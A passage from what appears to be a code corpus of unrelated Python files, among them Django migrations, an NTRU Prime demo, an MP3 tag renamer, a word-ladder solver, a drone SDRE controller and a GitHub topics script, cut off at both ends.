                           t_train[idx_eqns],
                           layers,
                           meal_tq)

    # Annealed learning-rate schedule for the network weights.
    model.train(num_epochs=25000, batch_size=N_eqns, learning_rate=1e-3)
    model.train(num_epochs=25000, batch_size=N_eqns, learning_rate=1e-4)
    model.train(num_epochs=10000, batch_size=N_eqns, learning_rate=1e-5)

    # NN prediction
    meal_tq = [np.array([N*[x] for x in meal_t]).T,
               np.array([N*[x/Vg2] for x in meal_q]).T]
    S_pred = model.predict(t_star[:,None], meal_tq)

    plotting(t_star, S_star, S_pred, idx_data, Vg2)

    # Report the inferred parameters, rescaled back to physical units.
    print('k = %.6f' % ( model.sess.run(model.k) ) )
    print('Rm = %.6f' % ( model.sess.run(model.Rm)*Vg2 ) )
    print('Vg = %.6f' % ( model.sess.run(model.Vg) ) )
    print('C1 = %.6f' % ( model.sess.run(model.C1)*Vg2 ) )
    print('a1 = %.6f' % ( model.sess.run(model.a1) ) )
    print('Ub = %.6f' % ( model.sess.run(model.Ub)*Vg2 ) )
    print('C2 = %.6f' % ( model.sess.run(model.C2)*Vg2 ) )
    print('U0 = %.6f' % ( model.sess.run(model.U0)*Vg2 ) )
    print('Um = %.6f' % ( model.sess.run(model.Um)*Vg2 ) )
    print('C3 = %.6f' % ( model.sess.run(model.C3)*Vg2 ) )
    print('C4 = %.6f' % ( model.sess.run(model.C4)*Vg2 ) )
    print('Vi = %.6f' % ( model.sess.run(model.Vi) ) )
    print('E = %.6f' % ( model.sess.run(model.E) ) )
    print('ti = %.6f' % ( model.sess.run(model.ti) ) )
    print('beta = %.6f' % ( model.sess.run(model.beta) ) )
    print('Rg = %.6f' % ( model.sess.run(model.Rg)*Vg2 ) )
    print('alpha = %.6f' % ( model.sess.run(model.alpha) ) )
    print('Vp = %.6f' % ( model.sess.run(model.Vp) ) )
    print('C5 = %.6f' % ( model.sess.run(model.C5)*Vg2 ) )
    print('tp = %.6f' % ( model.sess.run(model.tp) ) )
    print('td = %.6f' % ( model.sess.run(model.td) ) )

    # Prediction based on inferred parameters
    # k = 0.007751
    # Vp = 0.707807
    # Vi = 2.689281
    # S0 = 12.0*Vp
    # S1 = 4.0*Vi
    # S2 = 110.0*Vg2
    # S3 = 0.0
    # S4 = 0.0
    # S5 = 0.0
    # x0 = np.array([S0, S1, S2, S3, S4, S5]).flatten()
    # S_pred = odeint(f_pred, x0, t_star)
    # S_pred /= Vg2
    # IG_pred = np.array([intake(t, k) for t in t_star]) / Vg2
    # S_pred = np.append(S_pred[:,:], IG_pred[:,None], axis=1)
    # plotting(t_star, S_star, S_pred, idx_data, Vg2, forecast=True)

    # savefig('./figures/Glycolytic', crop = False)
# Generated by Django 3.1.2 on 2020-11-12 06:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Move the many-to-many relations onto Product.

    ``Category.products`` and ``Store.products`` are removed and replaced by
    ``Product.categories`` and ``Product.stores``.
    """

    dependencies = [
        ('food_items', '0001_initial'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='category',
            name='products',
        ),
        migrations.RemoveField(
            model_name='store',
            name='products',
        ),
        migrations.AddField(
            model_name='product',
            name='categories',
            field=models.ManyToManyField(to='food_items.Category'),
        ),
        migrations.AddField(
            model_name='product',
            name='stores',
            field=models.ManyToManyField(to='food_items.Store'),
        ),
    ]
| 775 | 230 |
from ciphers import StreamlinedNTRUPrime

# choose your parameters
p, q, w = 761, 4591, 286

print('Streamlined NTRU Prime Example for', f'p={p}, q={q}, w={w}')
print('-' * 50)

ntru = StreamlinedNTRUPrime(p, q, w, seed=1337)

print('Generating key pair ... ')
public_key, secret_key = ntru.generate_keys()

print('En/decrypting...')
# Round-trip a random small polynomial through encrypt/decrypt.
plaintext = ntru.random_small_poly(w, None, ntru.modulus_r)
ciphertext = ntru.encrypt(plaintext, public_key)
assert plaintext == ntru.decrypt(ciphertext, secret_key), 'En/decryption failed.'
print('Successfully en/decrypted.')
| 511 | 204 |
# -*- coding: utf-8 -*-
import os, sys, shutil, re
def trip_space(s):
    """Strip trailing NUL ('\x00') padding characters from *s*."""
    # rstrip removes exactly the run of trailing NULs the original
    # while-loop peeled off one character at a time.
    return s.rstrip('\x00')
def _print(*args):
    """Print *args* space-separated, swallowing console encoding errors.

    Python 2 print statements: the trailing comma keeps the items on one
    line, and the final ``print '\n'`` emits the newline character plus the
    statement's own newline, so printed records are separated by a blank
    line.  UnicodeEncodeError (e.g. a console codepage that cannot render a
    tag title) is reported instead of crashing the copy loop.
    """
    try:
        for arg in args:
            print arg,
        print '\n'
    except UnicodeEncodeError as msg:
        print 'Error to print', args, msg
# ID3V2, ID3V3
class MP3:
    """Minimal ID3v2 tag reader (Python 2): collects text frames into self.tags.

    The whole file is read into memory and parsed as a byte string; bytes are
    converted with ord() throughout.
    """

    def __init__(self, filepath):
        self.filepath = filepath
        f = open(filepath, 'rb')
        self.data = f.read()
        f.close()
        self.tags = {} # tags
        try:
            self.read_header()
            self.read_id_frame()
        except Exception:
            # Best effort: a malformed or absent tag just leaves self.tags
            # incomplete; title() then falls back to the file name.
            pass

    def read_header(self):
        """Parse the 10-byte ID3v2 header at the start of the file."""
        data = self.data
        self.Header = data[:3] #ID3
        self.Ver = ord(data[3:4])
        self.Revision = ord(data[4:5])
        self.Flag = ord(data[5:6])
        Size = data[6:10]
        # Tag size is a 28-bit "synchsafe" integer: 7 payload bits per byte.
        # The `or 0` guards only an empty slice from a truncated file.
        self.total_size = (ord(Size[0])&0x7F)*0x200000+ (ord(Size[1] or 0)&0x7F)*0x400 + (ord(Size[2] or 0)&0x7F)*0x80 +(ord(Size[3] or 0)&0x7F)

    def read_id_frame(self):
        """Walk the ID3v2 frames and decode the text frames into self.tags."""
        data = self.data
        cur_index = 10  # frames start right after the 10-byte header
        while cur_index < self.total_size:
            FrameID = data[cur_index:cur_index+4]
            FrameSize = data[cur_index+4:cur_index+8]
            # BUG FIX: the most significant byte of the 32-bit big-endian
            # frame size was weighted 0x100000000 (2**32) instead of
            # 0x1000000 (2**24), corrupting the size of any frame >= 16 MB
            # and desynchronising the walk from then on.
            FSize = ord(FrameSize[0])*0x1000000 + ord(FrameSize[1])*0x10000+ ord(FrameSize[2])*0x100 + ord(FrameSize[3])
            FrameFlags = data[cur_index+8:cur_index+10]
            # Refers to http://blog.sina.com.cn/s/blog_80ab598b0102vbao.html
            # decoding tag info.
            if FrameID != 'APIC':  # skip attached-picture frames entirely
                info = data[cur_index+10:cur_index+10+FSize]
                try:
                    st = info.rfind(b'\xff\xfe')
                    if st != -1: # \x01\xff\xfe.....\xff\xfe -- UTF-16 with BOM
                        self.tags[FrameID] = trip_space(info[st+2:].decode('utf16'))
                    elif info.startswith(b'\x03'):  # encoding marker 3: UTF-8
                        self.tags[FrameID] = trip_space(info[1:].decode())
                    else: #\x00 -- decoded as GBK for Chinese-tagged files
                        self.tags[FrameID] = info[1:-1].replace(b'\x00',b'\x20').decode('gbk')
                except UnicodeDecodeError as msg:
                    # Undecodable frames are simply skipped.
                    pass
            cur_index += 10 + FSize

    def is_valid(self):
        """True when the file actually starts with an ID3 header."""
        return self.Header == 'ID3'

    def title(self):
        """Return the TIT2 (title) tag, falling back to the base file name."""
        return self.tags.get('TIT2') or os.path.basename(self.filepath).split('.')[0]
if __name__ == '__main__':
    # Copy every MP3 in the cache folder to the output folder, renamed to its
    # ID3 title (falling back to the original file name).
    if len(sys.argv) < 3:
        print 'Usage: %s [cache folder] [output_folder]' %sys.argv[0]
        sys.exit(0)
    input_dir = sys.argv[1]
    output_dir = sys.argv[2]
    if not os.path.isdir(output_dir):
        os.mkdir(output_dir)
    files = os.listdir(input_dir)
    for file in files:
        src_path = os.path.join(input_dir, file)
        if os.path.isdir(src_path): continue # don't process directory
        mp3 = MP3(src_path)
        if mp3.is_valid():
            title = mp3.title()
            # Replace characters that are illegal in Windows file names.
            title_repl = re.sub('[\\\/\:\*\?"<>|]', '_', title)
            dest_path = os.path.join(output_dir, title_repl+'.mp3')
            _print(src_path, '>>', dest_path)
            shutil.copy(src_path, dest_path)
| 3,721 | 1,452 |
from typing import Dict, FrozenSet, Iterable, Iterator, List, Optional, Sequence, Tuple

from word_ladder.types import WordDict
from word_ladder.rung import Rung
def get_word_with_letter_missing(word: str, position: int) -> str:
    """
    >>> get_word_with_letter_missing('dog', 0)
    '?og'
    >>> get_word_with_letter_missing('dog', 1)
    'd?g'
    >>> get_word_with_letter_missing('dog', 2)
    'do?'
    """
    # The slice formula covers the first and last positions too: word[:0]
    # and word[position + 1:] are simply empty strings there.
    return f'{word[:position]}?{word[position + 1:]}'
def get_neighbors(word: str, words: WordDict) -> FrozenSet[str]:
    """Return every dictionary word one letter away from *word* (the word
    itself is included when it appears in the dictionary).

    >>> words = {'?og': ['dog', 'log', 'fog'], 'd?g': ['dog', 'dig'], 'do?': ['dog'], 'l?g': ['log'], 'lo?': ['log']}
    >>> sorted(get_neighbors('dig', words))
    ['dig', 'dog']
    >>> sorted(get_neighbors('fog', words))
    ['dog', 'fog', 'log']
    """
    # Annotation fix: the function builds and returns a frozenset, which is
    # not a Sequence; callers only iterate/sort it, so this is compatible.
    return frozenset(
        neighbor
        for position in range(len(word))
        for neighbor in words.get(get_word_with_letter_missing(word, position), [])
    )
def get_all_previous_words(rung: Rung) -> Tuple[str, ...]:
    """Collect the words of *rung* and every earlier rung into one tuple.

    Annotation fix: ``Tuple[str]`` means a tuple of exactly one string;
    the variadic ``Tuple[str, ...]`` matches what is actually returned.

    >>> rung_0 = Rung(None, ['dig'], {})
    >>> path = {'dog': ('log', 'fog', 'dig', 'dug', 'don', 'dob'), 'fig': ('dig', 'fog', 'fin')}
    >>> words = ['dob', 'don', 'dug', 'fin', 'fog', 'log']
    >>> rung_1 = Rung(rung_0, words, path)
    >>> sorted(get_all_previous_words(rung_1))
    ['dig', 'dob', 'don', 'dug', 'fin', 'fog', 'log']
    """
    return tuple(rung.words) + (get_all_previous_words(rung.previous) if rung.previous else ())
def get_next_rung(previous_rung: Rung, words: WordDict) -> Rung:
    """
    >>> from word_ladder.compile_words import add_to_words_dict
    >>> words = {}
    >>> for w in ['dog', 'log', 'fog', 'dig', 'dug', 'dim', 'don', 'dob', 'lug', 'fin']:
    ...     words = add_to_words_dict(words, w)
    >>> rung = Rung(None, ['dog', 'fig'], {})
    >>> next_rung = get_next_rung(rung, words)
    >>> {k: sorted(v) for k,v in next_rung.path.items()}
    {'dog': ['dig', 'dob', 'don', 'dug', 'fog', 'log'], 'fig': ['dig', 'fin', 'fog']}
    >>> sorted(next_rung.words)
    ['dig', 'dob', 'don', 'dug', 'fin', 'fog', 'log']
    """
    # Words already seen on any earlier rung must not reappear, otherwise the
    # ladder search would loop.
    seen = get_all_previous_words(previous_rung)
    path = {}
    for source_word in previous_rung.words:
        path[source_word] = tuple(
            candidate
            for candidate in get_neighbors(source_word, words)
            if candidate not in seen
        )
    # The next rung's word set is the union of all reachable new words.
    next_words = frozenset(w for reachable in path.values() for w in reachable)
    return Rung(previous_rung, next_words, path)
def keys_for_value(d: Dict[str, Iterable[str]], value: str) -> Iterator[str]:
    """
    >>> d = {'a': ['x', 'y', 'z'], 'b': ['l', 'm', 'z'], 'c': ['t', 'u']}
    >>> list(keys_for_value(d, 'y'))
    ['a']
    >>> list(keys_for_value(d, 'u'))
    ['c']
    >>> list(keys_for_value(d, 'z'))
    ['a', 'b']
    """
    # Lazily yield each key whose value collection contains *value*.
    yield from (key for key, members in d.items() if value in members)
def get_ladders(rung: Rung, word: str) -> Sequence[List[str]]:
    """
    >>> rung_0 = Rung(None, ['dig'], {})
    >>> rung_1 = Rung(rung_0, ['dog', 'log', 'fig', 'din'], {'dig': ('dog', 'log', 'fig', 'din')})
    >>> words = ['dig', 'dob', 'don', 'dug', 'fin', 'fog', 'log', 'din']
    >>> path = {'dog': ('log', 'fog', 'dig', 'dug', 'don', 'dob'), 'fig': ('dig', 'fog', 'fin'), 'din': ('dig', 'fin')}
    >>> rung_2 = Rung(rung_1, words, path)
    >>> get_ladders(rung_2, 'fin')
    [['dig', 'fig', 'fin'], ['dig', 'din', 'fin']]
    """
    # Base case: the first rung contributes the single-word ladder.
    if not rung.previous:
        return [[word]]
    # Recurse through every predecessor that can reach *word* on this rung.
    ladders = []
    for predecessor in keys_for_value(rung.path, word):
        for partial in get_ladders(rung.previous, predecessor):
            ladders.append(partial + [word])
    return ladders
def build_rungs(start_word, target_word, words) -> Rung:
    """Grow rungs from *start_word* until *target_word* appears or the
    frontier empties; returns the last rung built."""
    rung = Rung(None, [start_word], {})
    counter = 1
    while rung.words and target_word not in rung.words:
        rung = get_next_rung(rung, words)
        counter += 1
        if rung.words:
            print(f'Round {counter}: {len(rung.words):3} possible words, eg. {", ".join(sorted(rung.words)[:6])}')
    return rung
| 4,123 | 1,594 |
"""Package init file.
We want the user to get everything right away upon `import nawrapper as nw`.
"""
from .power import *
from .maptools import *
from .covtools import *
from . import planck
| 194 | 57 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Create the DataValidation model, which records an entered URN, its
    standardised/formatted forms and any matching Case."""

    dependencies = [
        ('plea', '0014_auto_20151119_1136'),
    ]

    operations = [
        migrations.CreateModel(
            name='DataValidation',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date_entered', models.DateTimeField(auto_created=True)),
                ('urn_entered', models.CharField(max_length=50)),
                ('urn_standardised', models.CharField(max_length=50)),
                ('urn_formatted', models.CharField(max_length=50)),
                ('case_match_count', models.PositiveIntegerField(default=0)),
                ('case_match', models.ForeignKey(blank=True, to='plea.Case', null=True)),
            ],
        ),
    ]
| 923 | 276 |
from cloudify import ctx
from cloudify.decorators import operation
from a4c_common.wrapper_util import (USE_EXTERNAL_RESOURCE_KEY,handle_external_resource,handle_resource_ids)
from openstack import with_cinder_client
from openstack.volume import create
@operation
@with_cinder_client
def overrided_create_volume(cinder_client, args, **_):
    """Wrap the stock openstack volume creation with external-resource
    bookkeeping before delegating to the plugin's create()."""
    handle_external_resource()
    use_external = ctx.instance.runtime_properties[USE_EXTERNAL_RESOURCE_KEY]
    if use_external:
        handle_resource_ids()
    create(cinder_client, args, **_)
| 498 | 161 |
from typing import Iterator, List, Optional
from drift_report.domain.model import Model
class ModelRepository:
    """Simple in-memory repository of Model records."""

    def __init__(self) -> None:
        # Backing store; entries are kept in insertion order.
        self.state: List[Model] = []

    def create(self, model: Model):
        """Store *model* in the repository."""
        self.state.append(model)

    def all(self) -> Iterator[Model]:
        """Iterate over every stored model."""
        return iter(self.state)

    def find(self, name: str, version: int) -> Optional[Model]:
        """Return the first model matching *name* and *version*, or None."""
        hits = (m for m in self.state if m.name == name and m.version == version)
        return next(hits, None)


# Module-level singleton repository shared by the application.
MODEL_REPO = ModelRepository()
| 571 | 166 |
# PART 1
# Tally the submarine's horizontal position and depth, then print the product.
with open('input.txt') as input_file:
    x_pos = 0
    y_pos = 0
    for line in input_file:
        tokens = line.split(' ')
        direction = tokens[0]
        distance = int(tokens[1])
        if direction == "forward":
            x_pos += distance
        elif direction == "down":
            y_pos += distance
        else:  # "up"
            y_pos -= distance
print(x_pos * y_pos)
# PART 2
# Same input, but "down"/"up" now adjust an aim; "forward" moves and dives
# by aim * distance. Verbose per-line debug printing is left in place.
with open('input.txt') as input_file:
    x_pos = 0
    y_pos = 0
    aim_vector = 0
    for line in input_file:
        direction = line.split(' ')[0]
        distance = int(line.split(' ')[1])
        # debug dump of state before applying this command
        print("*******************************************")
        print("direction:", direction)
        print("distance:", distance)
        print("old_aim:", aim_vector)
        print("old_x_pos:", x_pos)
        print("old_y_pos:", y_pos)
        print("---------------------------")
        if direction == "forward":
            x_pos += distance
            y_pos += aim_vector * distance
        elif direction == "down":
            aim_vector += distance
        else:
            aim_vector -= distance
        # debug dump of state after applying this command
        print("direction:", direction)
        print("distance:", distance)
        print("aim:", aim_vector)
        print("x_pos:", x_pos)
        print("y_pos:", y_pos)
        print("*******************************************")
print("x_pos:", x_pos)
print("y_pos:", y_pos)
print("x*y:", x_pos * y_pos)
from typing import Optional
from pydantic import BaseModel
from cosmopy.model import CosmosModel
class Engine(BaseModel):
    """Engine specification (plain pydantic model, not persisted on its own)."""
    # horsepower
    hp: int
    # engine displacement — units not stated here; presumably cc. TODO confirm
    volume: int
class Car(CosmosModel):
    """Car document stored via cosmopy's CosmosModel (save/query/all/delete)."""
    make: str
    model: str
    # optional nested engine spec; queryable via engine__hp style lookups
    engine: Optional[Engine]
if __name__ == "__main__":
    # Demo: create, mutate, query and delete Car documents in Cosmos.
    passat = Car(make="VW", model="Passat")
    print(f"Car: {passat}")
    passat.save()
    passat.model = "Golf"
    # NOTE(review): save() appears to return the persisted document — confirm
    golf = passat.save()
    print(f"Model changed: {golf}")
    # A second car, this time with a nested Engine document.
    passat = Car(make="VW", model="Passat", engine=Engine(hp=100, volume=1600))
    passat.save()
    print(f"New passat: {passat}")
    # Query on a nested field (double-underscore path syntax).
    cars_100_hp = Car.query(engine__hp=100)
    print(f"Cars with 100 HP: {cars_100_hp}")
    cars = Car.all()
    print(f"All cars: {cars}")
    # Clean up everything that was created above.
    for c in cars:
        print(f"Deleting: {c}")
        c.delete()
| 794 | 312 |
#!/usr/bin/env python
import rospy
import tf
import scipy.linalg as la
import numpy as np
from math import *
import mavros_msgs.srv
from mavros_msgs.msg import AttitudeTarget
from nav_msgs.msg import Odometry
from std_msgs.msg import *
from test.msg import *
from geometry_msgs.msg import *
from mavros_msgs.msg import *
from quadcopter.msg import *
import time
import control.matlab as mb
# Module-level setup: SDRE attitude controller node publishing attitude
# setpoints to MAVROS. (Python 2 file — see the print statements below.)
rospy.init_node('sdre', anonymous=True)
pub = rospy.Publisher("/mavros/setpoint_raw/attitude", AttitudeTarget, queue_size=10)
# Current vehicle attitude (updated in callback()).
roll = 0.0
pitch = 0.0
yaw = 0.0
msg = AttitudeTarget()
#[10,-10,0] #ardu
# Target position in the global frame.
goal = np.array([50.0, 5.0, 0.0])
goal_body = np.array([0.0, 0.0, 0.0])
# Current vehicle position (updated in callback()).
x = 0.0
y = 0.0
z = 0.0
error_head_prev = 0.0
# Camera geometry: mount angle and half fields of view, radians.
camera_mount = 0.785398
horizontal = 1.04719/2
vertical = 1.04719/2
vel_rover = [0,0,0]
# Linear double-integrator state matrix for [x, vx, y, vy, z, vz].
A = np.array([[0, 1, 0, 0, 0, 0]
             ,[0, 0, 0, 0, 0, 0]
             ,[0, 0, 0, 1, 0, 0]
             ,[0, 0, 0, 0, 0, 0]
             ,[0, 0, 0, 0, 0, 1]
             ,[0, 0, 0, 0, 0, 0]])
now_p = time.time()
#### msg.x in mavros is -y in gazebo
#### msg.x in mavros is -y in gazebo
def land():
    """Switch to GUIDED mode and issue a MAVROS land command (Python 2)."""
    set_mode = rospy.ServiceProxy('/mavros/set_mode', mavros_msgs.srv.SetMode)
    print "set mode: ", set_mode(208,'GUIDED')
    land = rospy.ServiceProxy('/mavros/cmd/land', mavros_msgs.srv.CommandTOL)
    print "land: ", land(0,0,0,0,0)
def callback(info):
    """Odometry callback: solve a state-dependent Riccati equation (SDRE)
    in the body frame and publish an attitude/thrust setpoint, or land
    when close to the ground.
    """
    ##MUST GET HEADING
    global x, y, z, roll, pitch, yaw, vel_rover, vel_drone_rot, vel_drone_trans, head, now_p, error_head_prev, goal, goal_body
    ############################ ARDUPILOT-MAVROS COORDINATE FRAME
    ### Positions in global frame
    x = info.pose.pose.position.x
    y = info.pose.pose.position.y
    z = info.pose.pose.position.z
    ### Orientations in global frame
    a1 = info.pose.pose.orientation.x
    b1 = info.pose.pose.orientation.y
    c1 = info.pose.pose.orientation.z
    d1 = info.pose.pose.orientation.w
    ### All linear velocities are local
    v_x = info.twist.twist.linear.x
    v_y = info.twist.twist.linear.y
    v_z = info.twist.twist.linear.z
    ### All angular velocities are local
    v_roll = info.twist.twist.angular.x
    v_pitch = info.twist.twist.angular.y
    v_yaw = info.twist.twist.angular.z
    roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])
    # ZYX Euler rotation matrix from body to inertial frame.
    Rot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]
                                    ,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]
                                    ,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])
    Rot_inertial_to_body = Rot_body_to_inertial.transpose()
    # Position error expressed first in the inertial frame...
    goal_body[0] = goal[0]-x
    goal_body[1] = goal[1]-y
    goal_body[2] = goal[2]-z
    #rospy.loginfo("GOA1 %s", goal_body)
    #### Global to Body rotation
    goal_body = np.matmul(Rot_inertial_to_body,goal_body.transpose())
    #rospy.loginfo("GOAL2 %s %s", Rot_inertial_to_body, goal_body)
    #rospy.loginfo("GOAL %s", goal_body)
    #vel_rover = np.dot(Rot,vel_rover) #### Velocity transformations to be done
    #vel_rover_body = [vel_rover[1],vel_rover[0],vel_rover[2]]
    # State-dependent weights: larger position error => heavier penalty.
    Q = np.array([[goal_body[0]**2, 0, 0, 0, 0, 0]
                 ,[0, (goal_body[0]+2)**2, 0, 0, 0, 0]
                 ,[0, 0, goal_body[1]**2, 0, 0, 0]
                 ,[0, 0, 0, (goal_body[1]+2)**2, 0, 0]
                 ,[0, 0, 0, 0, 1, 0]
                 ,[0, 0, 0, 0, 0, 1]])
    R = np.array([[abs(goal_body[0]*goal_body[1]), 0, 0]
                 ,[0, goal_body[0]**2, 0]
                 ,[0, 0, goal_body[1]**2]])
    ### Calculation for control done in body fixed frame
    X = np.array([[goal_body[0]],[vel_rover[0]-v_x],[goal_body[1]],[vel_rover[1]-v_y],[goal_body[2]],[vel_rover[2]-v_z]])
    ### d2(e_x)/dt2 = 0-d2(x)/dt2 so all signs inverted
    B = np.array([[0, 0, 0], [0, -9.8, 0], [0, 0, 0], [0, 0, 9.8], [0, 0, 0], [-1, 0, 0]])
    #(P,L,G) = mb.care(A, B, Q, R)
    # Solve the continuous algebraic Riccati equation for this state.
    P = la.solve_continuous_are(A, B, Q, R)
    # LQR-style feedback: u = -R^-1 B^T P X.
    u = np.matmul(-np.linalg.inv(R),B.transpose())
    u = np.matmul(u,P)
    u = np.dot(u,X)
    #rospy.loginfo("U%s",u)
    #Rot = Rot.transpose()
    #inputs = np.dot(Rot,[[0], [0], [u[0]]])
    # Map acceleration command to normalized thrust, then clamp thrust and
    # roll/pitch commands to safe limits (0.5 thrust, +/-15 deg).
    u[0] = (u[0]+9.8)*0.5/9.8
    if u[0]>0.5:
        u[0] = 0.5
    if u[1]>15*np.pi/180:
        u[1] = 15*np.pi/180
    if u[1]<-15*np.pi/180:
        u[1] = -15*np.pi/180
    if u[2]>15*np.pi/180:
        u[2] = 15*np.pi/180
    if u[2]<-15*np.pi/180:
        u[2] = -15*np.pi/180
    now = time.time()
    # Near the ground: hand over to the landing sequence.
    if z<0.25:
        land()
    else:
        quater = tf.transformations.quaternion_from_euler(u[2],u[1],yaw) #+yaw_rate*(now-now_p)
        msg.header = Header()
        msg.type_mask = 0
        msg.orientation.x = quater[0]
        msg.orientation.y = quater[1]
        msg.orientation.z = quater[2]
        msg.orientation.w = quater[3]
        msg.body_rate.x = 0.0
        msg.body_rate.y = 0.0
        msg.body_rate.z = 0.0
        msg.thrust = u[0]
        ##VELOCITIES HERE
        pub.publish(msg)
    now_p = time.time()
    #error_head_prev = error_head
    rospy.loginfo("States %s", X)
    rospy.loginfo("Inputs %s", u)
    #rospy.loginfo("ANGLES %s",[roll, pitch, yaw])
rate = rospy.Rate(10)
'''
def ReceiveTar(data):
global goal, x, y, z, roll, pitch, yaw, camera_mount, horizontal, vertical
xt_image=data.contour.center.x
yt_image=data.contour.center.y
xt_image -= 250
yt_image -= 250
width=data.contour.width
height=data.contour.height
if(width<30 or height<30):
goal[0] = goal[0] + vel_rover[0]*0.1
goal[1] = goal[1] + vel_rover[1]*0.1
ro
#rospy.loginfo("DATA %s %s",xt_image,yt_image)
else:
d_xbound = 2*(z/sin(camera_mount))*tan(horizontal)
x_ppm = d_xbound/500
d_ybound = z/tan(camera_mount-vertical) - z/tan(camera_mount+vertical)
y_ppm = d_ybound/500
x_origin = x + (z/tan(camera_mount))*cos(yaw) #In global frame
y_origin = y + (z/tan(camera_mount))*sin(yaw)
yt_image = -yt_image
xt_image = xt_image*x_ppm
yt_image = yt_image*y_ppm
x_new = x_origin + xt_image*cos(yaw-np.pi/2) - yt_image*sin(yaw-np.pi/2)
y_new = y_origin + xt_image*sin(yaw-np.pi/2) + yt_image*cos(yaw-np.pi/2)
#x_new = x - x_prev*cos(yaw)
#y_new = y - y_prev*sin(yaw)
goal[0] = x_new
goal[1] = y_new
rospy.loginfo("POSN %s %s %s %s ", x_new, y_new, x, y)
'''
def listener():
    """Subscribe to local odometry and spin until node shutdown."""
    rospy.Subscriber("/mavros/local_position/odom", Odometry, callback)
    #rospy.Subscriber('/landing_target_info_new', TargetInfo,ReceiveTar)
    rospy.spin()
if __name__ == '__main__':
    # Run the node; swallow the interrupt raised on shutdown.
    try:
        listener()
    except rospy.ROSInterruptException:
        pass
#!/usr/bin/env python3
import argparse
import asyncio
import json
from aiohttp import ClientSession, BasicAuth, ClientTimeout
import os
import aiohttp_github_helpers as h
# GitHub credentials come from the environment; AUTH stays None (anonymous,
# lower rate limit) unless both are set.
GITHUB_USER = os.environ.get('GITHUB_USER', None)
GITHUB_PASS = os.environ.get('GITHUB_PASS', None)
# Hard cap on total request time per session.
TIMEOUT = ClientTimeout(total=20)
AUTH = None
if GITHUB_USER is not None and GITHUB_PASS is not None:
    AUTH = BasicAuth(GITHUB_USER, GITHUB_PASS)
ORG = "metwork-framework"
# NOTE(review): TOPICS_TO_EXCLUDE is unused in this chunk — verify callers.
TOPICS_TO_EXCLUDE = ["testrepo"]
async def get_repo_topics(owner, name):
    """Fetch the GitHub topics of the ``owner/name`` repository.

    Args:
        owner: repository owner (user or organisation login).
        name: repository name.

    Returns:
        The list of topic strings returned by the GitHub API helper.
    """
    # The original initialised a throwaway `topics = []` that was always
    # overwritten; return the helper's result directly instead.
    async with ClientSession(auth=AUTH, timeout=TIMEOUT) as session:
        return await h.github_get_repo_topics(session, owner, name)
# Command-line interface: print a repo's topics, optionally as JSON.
parser = argparse.ArgumentParser(description='get repo topics')
parser.add_argument('owner', type=str, help='repo owner')
parser.add_argument('name', type=str, help='repo name')
parser.add_argument('--json', action='store_true',
                    help='if set, format the output as a json list')
args = parser.parse_args()
# asyncio.run() replaces the deprecated get_event_loop()/
# run_until_complete()/close() dance and guarantees loop cleanup.
reply = asyncio.run(get_repo_topics(args.owner, args.name))
if args.json:
    print(json.dumps(reply))
else:
    for topic in reply:
        print(topic)
| 1,233 | 417 |
# import support libraries
import os
import time
import numpy as np
# import main working libraries
import cv2
import torch
from torch.autograd import Variable
from torchvision import transforms
from PIL import Image
# import app libraries
from darknet import Darknet
from utils import *
from MeshPly import MeshPly
class Line():
    """A 2D line in slope-intercept form, built from two points.

    Vertical lines keep the original "NaN" string sentinel in ``m`` and
    ``b`` (callers compare against it), but ``eval`` now raises instead of
    silently computing garbage on them.
    """
    def __init__(self,p1,p2):
        # tilt (slope); a zero run means the line is vertical
        if( (p2[0]-p1[0]) == 0.0 ):
            self.m = "NaN" # vertical line
        else:
            self.m = (p2[1]-p1[1])/(p2[0]-p1[0])
        # intercept (undefined for vertical lines)
        if(self.m == "NaN"):
            self.b = "NaN"
        else:
            self.b = -1.0*self.m*p1[0] + p1[1]
        self.p = p1 #store one sample
    def eval(self,x):
        """Return the y value of the line at *x*.

        Raises:
            ValueError: if the line is vertical (resolves the old TODO —
                previously an int x would silently return the string
                "NaNNaN…" because int * "NaN" repeats the string).
        """
        if self.m == "NaN":
            raise ValueError("cannot evaluate a vertical line at a given x")
        return(x*self.m + self.b)
def find_intersection(l1, l2):
    """Return the (x, y) intersection point of two non-parallel lines."""
    x_cross = (l2.b - l1.b)/(l1.m - l2.m)  # x coord of intersection point
    y_cross = l1.eval(x_cross)             # y coord of intersection point
    return x_cross, y_cross
# estimate bounding box
#@torch.no_grad
def test(datacfg, cfgfile, weightfile, imgfile):
    """Run single-image 6D pose estimation with a Darknet model, then
    estimate the gate's flyable area and display the annotated image.

    Args:
        datacfg: data config file path (mesh, name, diam entries).
        cfgfile: YOLO network config file path.
        weightfile: trained weights file path.
        imgfile: input image path.

    Side effects: opens an OpenCV window and blocks on a key press;
    requires CUDA (model and input are moved to the GPU unconditionally).
    """
    # ******************************************#
    # PARAMETERS PREPARATION                    #
    # ******************************************#
    #parse configuration files
    options = read_data_cfg(datacfg)
    meshname = options['mesh']
    name = options['name']
    #Parameters for the network
    seed = int(time.time())
    gpus = '0' # define gpus to use
    test_width = 608 # define test image size
    test_height = 608
    torch.manual_seed(seed) # seed torch random
    use_cuda = True
    if use_cuda:
        os.environ['CUDA_VISIBLE_DEVICES'] = gpus
        torch.cuda.manual_seed(seed) # seed cuda random
    conf_thresh = 0.1
    num_classes = 1
    # Read object 3D model, get 3D Bounding box corners
    mesh = MeshPly(meshname)
    vertices = np.c_[np.array(mesh.vertices), np.ones((len(mesh.vertices), 1))].transpose()
    #print("Vertices are:\n {} Shape: {} Type: {}".format(vertices,vertices.shape, type(vertices)))
    corners3D = get_3D_corners(vertices)
    feet_cm = 30.48 # 1 ft = 30.48 cm
    # Hard-coded 11ft x 1ft x 11ft gate corner coordinates (cm), overriding
